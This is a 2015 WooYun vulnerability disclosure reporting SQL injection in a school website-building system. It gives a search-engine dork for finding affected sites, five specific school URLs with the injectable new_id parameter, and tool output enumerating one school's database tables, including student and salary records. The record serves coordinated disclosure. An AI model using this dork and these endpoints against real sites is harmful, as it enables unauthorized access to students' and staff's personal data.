当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0105171

漏洞标题:某建站存在漏洞影响众多学校

相关厂商:凌翔科技

漏洞作者: 路人甲

提交时间:2015-04-01 15:45

修复时间:2015-07-02 18:26

公开时间:2015-07-02 18:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-01: 细节已通知厂商并且等待厂商处理中
2015-04-03: 厂商已经确认,细节仅向厂商公开
2015-04-06: 细节向第三方安全合作伙伴开放
2015-05-28: 细节向核心白帽子及相关领域专家公开
2015-06-07: 细节向普通白帽子公开
2015-06-17: 细节向实习白帽子公开
2015-07-02: 细节向公众公开

简要描述:

全是学校

详细说明:

这次不会错了吧

漏洞证明:

以下:
百度:inurl:cla_gonggao.php?new_id=*&

0.png


1、http://www.zjyjzx.com/classweb/cla_gonggao.php?new_id=2684&type=WENZHANG&table=1&class_id=129

1.png


2、http://www.lsxx.cn/classweb/cla_gonggao.php?new_id=460&type=WENZHANG&table=1&class_id=117

2.jpg


3、http://www.nbyzgqzx.net/classweb/cla_gonggao.php?new_id=1022&type=WENZHANG&table=1

3.png


4、http://nbyzgqzx.net/classweb/cla_gonggao.php?new_id=943&type=WENZHANG&table=1

4.png


5、http://www.xxzzx.net/classweb/cla_gonggao.php?new_id=56&type=CLAGG&table=1&class_id=161

5.png


Target: http://nbyzgqzx.net/classweb/cla_gonggao.php?new_id=943&type=WENZHANG&table=1
DB Server: MySQL >=5
Current DB: gqzx_db
Table found: aaa
Table found: hx_message
Table found: tb_grade
Table found: tpl_bdmcheck
Table found: tpl_answer
Table found: tpl_beike
Table found: tpl_beifen
Table found: tpl_bgs
Table found: tpl_article
Table found: tpl_bed
Table found: tpl_blog
Table found: tpl_book
Table found: tpl_bookcs
Table found: tpl_bookf
Table found: tpl_bookfltj
Table found: tpl_cat
Table found: tpl_bookisbn
Table found: tpl_check
Table found: tpl_bowen
Table found: tpl_bookyuyue
Table found: tpl_bookfz
Table found: tpl_class
Table found: tpl_checkinfo
Table found: tpl_classroom
Table found: tpl_coursechange
Table found: tpl_costeacher
Table found: tpl_club
Table found: tpl_countnum
Table found: tpl_coursegrade
Table found: tpl_coursecapply
Table found: tpl_course
Table found: tpl_coursetapply
Table found: tpl_classteacher
Table found: tpl_coursetk
Table found: tpl_deyulist
Table found: tpl_courseweek
Table found: tpl_ebookfuzhu
Table found: tpl_ebook
Table found: tpl_excellstu
Table found: tpl_doccat
Table found: tpl_dianfei
Table found: tpl_dkjc
Table found: tpl_filerecord
Table found: tpl_film
Table found: tpl_facility
Table found: tpl_fdl
Table found: tpl_exam
Table found: tpl_gongzi
Table found: tpl_film(old1)
Table found: tpl_gfteach
Table found: tpl_jieshu
Table found: tpl_help
Table found: tpl_jiang
Table found: tpl_grade
Table found: tpl_group
Table found: tpl_jiankao
Table found: tpl_floor
Table found: tpl_jieshuz
Table found: tpl_khinfo
Table found: tpl_kh
Table found: tpl_lh
Table found: tpl_kch
Table found: tpl_kaochang
Table found: tpl_kwcl
Table found: tpl_lives
Table found: tpl_link
Table found: tpl_lmessage
Table found: tpl_lydjsb
Table found: tpl_mbfuzu
Table found: tpl_member
Table found: tpl_lygongzuoshi(old)
Table found: tpl_lyxiushan
Table found: tpl_message
Table found: tpl_menu
Table found: tpl_lygongzuoshi
Table found: tpl_new
Table found: tpl_news
Table found: tpl_menu(old)
Table found: tpl_online
Table found: tpl_peishu
Table found: tpl_psyche
Table found: tpl_qjcat
Table found: tpl_qz
Table found: tpl_plan
Table found: tpl_qingjia
Table found: tpl_qjstep
Table found: tpl_qjidea
Table found: tpl_rights
Table found: tpl_resource
Table found: tpl_online1
Table found: tpl_resource(old)
Table found: tpl_selfstudy
Table found: tpl_shotmenu
Table found: tpl_score
Table found: tpl_sqconfirm
Table found: tpl_richcat
Table found: tpl_sqfriend
Table found: tpl_sqmsg
Table found: tpl_stu_jxj
Table found: tpl_stu_remark
Table found: tpl_sqgroup
Table found: tpl_sqset
Table found: tpl_stu_imburse
Table found: tpl_stu_hortation
Table found: tpl_stu_family
Table found: tpl_stu_logs
Table found: tpl_stu_punish
Table found: tpl_stu_study
Table found: tpl_tch_content
Table found: tpl_teachroom
Table found: tpl_term
Table found: tpl_student
Table found: tpl_wz_news(0)
Table found: tpl_test
Table found: tpl_wz_news
Table found: tpl_wz_news(old)
Table found: tpl_xcsb
Table found: tpl_xiangce
Table found: tpl_xiaochan
Table found: tpl_zuomian
Table found: tpl_yundong
Table found: tpl_xiushan

修复方案:

问乌云大牛们吧

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-04-03 18:24

厂商回复:

CNVD确认所述漏洞情况,暂未建立与软件生产厂商(或网站管理单位)的直接处置渠道,待认领。

最新状态:

暂无